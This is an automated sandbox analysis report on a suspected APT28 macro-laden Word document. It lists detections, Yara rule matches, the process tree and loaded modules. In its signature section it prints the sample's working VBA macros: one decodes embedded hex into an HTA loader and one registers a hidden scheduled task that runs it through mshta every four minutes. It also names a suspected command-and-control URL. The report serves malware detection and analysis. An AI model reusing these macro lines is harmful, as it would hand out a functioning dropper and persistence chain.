Edit tour

Windows Analysis Report
40#U0433.doc

Overview

General Information

Sample name:	40#U0433.doc renamed because original name is a hash value
Original sample name:	16-09-2024 .doc
Analysis ID:	1590275
MD5:	afe03893b7a5c589fc31f9ce9ed28a9f
SHA1:	8af5ac1b7432290e6070cf6d27a3a808db4a45b3
SHA256:	e440bad60823642e8976528bd450364ce2542d15a69778ff20996eb107158b8d
Tags:	docUAC-0063user-smica83
Infos:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Document contains an embedded VBA macro which accesses itself as a binary file (likely for evasion)

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with base64 encoded strings

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Machine Learning detection for dropped file

Machine Learning detection for sample

Office process queries suspicious COM object (likely to drop second stage)

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains an embedded VBA which reads its own file name (might be used to evade sandboxes)

Document contains embedded VBA macros

Searches for the Microsoft Outlook file path

Yara signature match

Classification

Process Tree

System is w11x64_office

appidpolicyconverter.exe (PID: 7656 cmdline: "C:\Windows\system32\appidpolicyconverter.exe" MD5: 6567D9CF2545FAAC60974D9D682700D4)

conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)

WINWORD.EXE (PID: 8076 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)

WINWORD.EXE (PID: 6632 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)

mshta.exe (PID: 688 cmdline: "C:\Windows\System32\mshta.exe" C:\Users\user\AppData\Local\Settings\locale MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
settings.xml	apt_susp_apt28_uac0063_malicious_doc_settings_xml	Detects some suspected APT28 document settings.xml	Sekoia.io	0x3713:$: Call svc.GetFolder( 0x3253:$: CreateTextFile(appdir

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Settings\locale	apt_susp_apt28_uac0063_hta_loader	Detects some suspected APT28 HTA loader	Sekoia.io	0x0:$: <HEAD><HTA:APPLICATION ID 0xec:$: script Language="VBScript.Encode

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.2753550030.00000293CD650000.00000004.00000800.00020000.00000000.sdmp	apt_susp_apt28_uac0063_hta_loader	Detects some suspected APT28 HTA loader	Sekoia.io	0x0:$: <HEAD><HTA:APPLICATION ID 0xec:$: script Language="VBScript.Encode
Process Memory Space: mshta.exe PID: 688	apt_susp_apt28_uac0063_hta_loader	Detects some suspected APT28 HTA loader	Sekoia.io	0x3b462:$: <HEAD><HTA:APPLICATION ID 0x3b54e:$: script Language="VBScript.Encode

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 40#U0433.doc

Avira: detected

Multi AV Scanner detection for submitted file

Source: 40#U0433.doc	Virustotal: Detection: 40%			Perma Link
Source: 40#U0433.doc	ReversingLabs: Detection: 34%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\~WRD0001.tmp	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\~WRD0002.tmp	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\~WRD0000.tmp	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 40#U0433.doc

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll

Jump to behavior

Source: mshta.exe, 0000000C.00000002.2751023520.0000029382EDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2752374027.00000293CBC08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2751456542.000002938348E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2751023520.0000029382ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2753550030.00000293CD600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://background-services.net
Source: mshta.exe, 0000000C.00000002.2751456542.0000029383565000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2750608776.00000293818D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2752210907.0000029383A90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://background-services.net/setup.php
Source: mshta.exe, 0000000C.00000002.2751456542.0000029383565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://background-services.net/setup.phpg
Source: mshta.exe, 0000000C.00000002.2751456542.0000029383565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://background-services.net/setup.phpi
Source: mshta.exe, 0000000C.00000002.2751023520.0000029382ED0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://background-services.netE02
Source: mshta.exe, 0000000C.00000002.2751193944.00000293832A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://background-services.netttings

System Summary

Malicious sample detected (through community Yara rule)

Source: settings.xml, type: SAMPLE	Matched rule: Detects some suspected APT28 document settings.xml Author: Sekoia.io
Source: 0000000C.00000002.2753550030.00000293CD650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects some suspected APT28 HTA loader Author: Sekoia.io
Source: Process Memory Space: mshta.exe PID: 688, type: MEMORYSTR	Matched rule: Detects some suspected APT28 HTA loader Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Settings\locale, type: DROPPED	Matched rule: Detects some suspected APT28 HTA loader Author: Sekoia.io

Document contains an embedded VBA macro with suspicious strings

Source: 40#U0433.doc	OLE, VBA macro line: tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp")
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function documeNt_opEn, String environ: tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp")	Name: documeNt_opEn
Source: ~WRD0001.tmp.10.dr	OLE, VBA macro line: Sub baads(): On Error Resume Next: Set svc = CreateObject("Schedule.Service"): Call svc.Connect: Set td = svc.NewTask(0): Set sets = td.settings: sets.Enabled = True: sets.Hidden = True: Set tr = td.triggers.Create(1): tr.StartBoundary = Year(Now) & "-" & Right("0" & Month(Now), 2) & "-" & Right("0" & Day(Now), 2) & "T" & Right("0" & Hour(Now), 2) & ":" & Right("0" & Minute(Now), 2) & ":" & Right("0" & Second(Now), 2): tr.Enabled = True: tr.Repetition.Interval = "PT4M": Set act = td.Actions.Create(0): act.Path = "C:\Windows\System32\mshta.exe": act.Arguments = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Settings\locale": Call svc.GetFolder("\").RegisterTaskDefinition("Settings\ServiceDispatch", td, 6, , , 3): End Sub
Source: ~WRD0001.tmp.10.dr	OLE, VBA macro line: Sub baads(): On Error Resume Next: Set svc = CreateObject("Schedule.Service"): Call svc.Connect: Set td = svc.NewTask(0): Set sets = td.settings: sets.Enabled = True: sets.Hidden = True: Set tr = td.triggers.Create(1): tr.StartBoundary = Year(Now) & "-" & Right("0" & Month(Now), 2) & "-" & Right("0" & Day(Now), 2) & "T" & Right("0" & Hour(Now), 2) & ":" & Right("0" & Minute(Now), 2) & ":" & Right("0" & Second(Now), 2): tr.Enabled = True: tr.Repetition.Interval = "PT4M": Set act = td.Actions.Create(0): act.Path = "C:\Windows\System32\mshta.exe": act.Arguments = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Settings\locale": Call svc.GetFolder("\").RegisterTaskDefinition("Settings\ServiceDispatch", td, 6, , , 3): End Sub
Source: ~WRD0001.tmp.10.dr	OLE, VBA macro line: Sub baads(): On Error Resume Next: Set svc = CreateObject("Schedule.Service"): Call svc.Connect: Set td = svc.NewTask(0): Set sets = td.settings: sets.Enabled = True: sets.Hidden = True: Set tr = td.triggers.Create(1): tr.StartBoundary = Year(Now) & "-" & Right("0" & Month(Now), 2) & "-" & Right("0" & Day(Now), 2) & "T" & Right("0" & Hour(Now), 2) & ":" & Right("0" & Minute(Now), 2) & ":" & Right("0" & Second(Now), 2): tr.Enabled = True: tr.Repetition.Interval = "PT4M": Set act = td.Actions.Create(0): act.Path = "C:\Windows\System32\mshta.exe": act.Arguments = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Settings\locale": Call svc.GetFolder("\").RegisterTaskDefinition("Settings\ServiceDispatch", td, 6, , , 3): End Sub
Source: ~WRD0001.tmp.10.dr	OLE, VBA macro line: Sub goods(): On Error Resume Next: Set fso = CreateObject("Scripting.FileSystemObject"): appdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Settings": fso.CreateFolder (appdir): Set OutPutFile = fso.CreateTextFile(appdir & "\locale", True): For j = 1 To Documents(1).Variables.Count - 3: vars = Documents(1).Variables(j): For i = 1 To Len(vars): OutPutFile.Write Chr("&H" & Mid(vars, i, 2)): i = i + 1: Next: Next: OutPutFile.Close: End Sub
Source: ~WRD0001.tmp.10.dr	OLE, VBA macro line: Sub goods(): On Error Resume Next: Set fso = CreateObject("Scripting.FileSystemObject"): appdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Settings": fso.CreateFolder (appdir): Set OutPutFile = fso.CreateTextFile(appdir & "\locale", True): For j = 1 To Documents(1).Variables.Count - 3: vars = Documents(1).Variables(j): For i = 1 To Len(vars): OutPutFile.Write Chr("&H" & Mid(vars, i, 2)): i = i + 1: Next: Next: OutPutFile.Close: End Sub
Source: ~WRD0001.tmp.10.dr	OLE, VBA macro line: Sub goods(): On Error Resume Next: Set fso = CreateObject("Scripting.FileSystemObject"): appdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Settings": fso.CreateFolder (appdir): Set OutPutFile = fso.CreateTextFile(appdir & "\locale", True): For j = 1 To Documents(1).Variables.Count - 3: vars = Documents(1).Variables(j): For i = 1 To Len(vars): OutPutFile.Write Chr("&H" & Mid(vars, i, 2)): i = i + 1: Next: Next: OutPutFile.Close: End Sub

Document contains an embedded VBA with base64 encoded strings

Source: VBA code instrumentation

OLE, VBA macro: Module ThisDocument, Function documeNt_opEn, String ThisDocument

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Source: 40#U0433.doc	Stream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions environment, expandenvironmentstrings, regwrite, run, environ
Source: ~WRD0002.tmp.2.dr	Stream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions environment, expandenvironmentstrings, regwrite, run, environ
Source: ~WRD0000.tmp.2.dr	Stream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions environment, expandenvironmentstrings, regwrite, run, environ
Source: ~WRD0001.tmp.10.dr	Stream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions environment, expandenvironmentstrings, environ

Office process queries suspicious COM object (likely to drop second stage)

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: 40#U0433.doc	OLE, VBA macro line: Sub documeNt_opEn()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function documeNt_opEn	Name: documeNt_opEn
Source: ~WRD0002.tmp.2.dr	OLE, VBA macro line: Private Function JbxHook_Open_1__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0)
Source: ~WRD0002.tmp.2.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~WRD0002.tmp.2.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0002.tmp.2.dr	OLE, VBA macro line: Set JbxHook_Open_1__ob_set = jbxthis.Open(jbxparam0)
Source: ~WRD0002.tmp.2.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0002.tmp.2.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~WRD0002.tmp.2.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob_set
Source: ~WRD0002.tmp.2.dr	OLE, VBA macro line: Set doc2 = JbxHook_Open_1__ob_set(14, objApp.Documents, namedoc)
Source: ~WRD0002.tmp.2.dr	OLE, VBA macro line: Sub documeNt_opEn()
Source: ~WRD0000.tmp.2.dr	OLE, VBA macro line: Private Function JbxHook_Open_1__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0)
Source: ~WRD0000.tmp.2.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~WRD0000.tmp.2.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0000.tmp.2.dr	OLE, VBA macro line: Set JbxHook_Open_1__ob_set = jbxthis.Open(jbxparam0)
Source: ~WRD0000.tmp.2.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0000.tmp.2.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~WRD0000.tmp.2.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob_set
Source: ~WRD0000.tmp.2.dr	OLE, VBA macro line: Set doc2 = JbxHook_Open_1__ob_set(14, objApp.Documents, namedoc)
Source: ~WRD0000.tmp.2.dr	OLE, VBA macro line: Sub documeNt_opEn()
Source: ~WRD0000.tmp.10.dr	OLE, VBA macro line: Sub docUment_oPen()::: ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block1ergegdr"):: ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block2ergegdr"):: goods: baads: Me.Close: End Sub
Source: ~WRD0001.tmp.10.dr	OLE, VBA macro line: Sub docUment_oPen()::: ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block1ergegdr"):: ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block2ergegdr"):: goods: baads: Me.Close: End Sub

Source: 40#U0433.doc	OLE indicator, VBA macros: true
Source: ~WRD0002.tmp.2.dr	OLE indicator, VBA macros: true
Source: ~WRD0000.tmp.2.dr	OLE indicator, VBA macros: true
Source: ~WRD0000.tmp.10.dr	OLE indicator, VBA macros: true
Source: ~WRD0001.tmp.10.dr	OLE indicator, VBA macros: true

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: settings.xml, type: SAMPLE	Matched rule: apt_susp_apt28_uac0063_malicious_doc_settings_xml author = Sekoia.io, description = Detects some suspected APT28 document settings.xml, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = fd104985-6441-4fb6-8cc1-30afa4a7797b, hash = 0272acc6ed17c72320e4e7b0f5d449841d0ccab4ea89f48fd69d0a292cc5d39a
Source: 0000000C.00000002.2753550030.00000293CD650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: apt_susp_apt28_uac0063_hta_loader author = Sekoia.io, description = Detects some suspected APT28 HTA loader, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = 8e1889c1-c6ac-4048-9d3a-99ccbbd5435f, hash = 332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725
Source: Process Memory Space: mshta.exe PID: 688, type: MEMORYSTR	Matched rule: apt_susp_apt28_uac0063_hta_loader author = Sekoia.io, description = Detects some suspected APT28 HTA loader, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = 8e1889c1-c6ac-4048-9d3a-99ccbbd5435f, hash = 332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725
Source: C:\Users\user\AppData\Local\Settings\locale, type: DROPPED	Matched rule: apt_susp_apt28_uac0063_hta_loader author = Sekoia.io, description = Detects some suspected APT28 HTA loader, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = 8e1889c1-c6ac-4048-9d3a-99ccbbd5435f, hash = 332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725

Source: classification engine

Classification label: mal92.expl.evad.winDOC@7/16@0/0

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\Desktop\~$#U0433.doc

Jump to behavior

Source: C:\Windows\System32\appidpolicyconverter.exe	Mutant created: PolicyMutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7708:120:WilError_03

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{8E17A4A3-F008-49AB-B1CF-7CC0089ADD49} - OProcSessId.dat

Jump to behavior

Source: 40#U0433.doc	OLE indicator, Word Document stream: true
Source: ~WRD0002.tmp.2.dr	OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.2.dr	OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.10.dr	OLE indicator, Word Document stream: true
Source: ~WRD0001.tmp.10.dr	OLE indicator, Word Document stream: true

Source: 40#U0433.doc	OLE document summary: title field not present or empty
Source: 40#U0433.doc	OLE document summary: edited time not present or 0
Source: ~WRD0002.tmp.2.dr	OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.2.dr	OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.2.dr	OLE document summary: edited time not present or 0
Source: ~WRD0000.tmp.10.dr	OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.10.dr	OLE document summary: edited time not present or 0
Source: ~WRD0001.tmp.10.dr	OLE document summary: title field not present or empty
Source: ~WRD0001.tmp.10.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\appidpolicyconverter.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 40#U0433.doc	Virustotal: Detection: 40%
Source: 40#U0433.doc	ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Windows\System32\appidpolicyconverter.exe "C:\Windows\system32\appidpolicyconverter.exe"
Source: C:\Windows\System32\appidpolicyconverter.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\user\AppData\Local\Settings\locale
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\appidpolicyconverter.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: virtdisk.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: directxdatabasehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
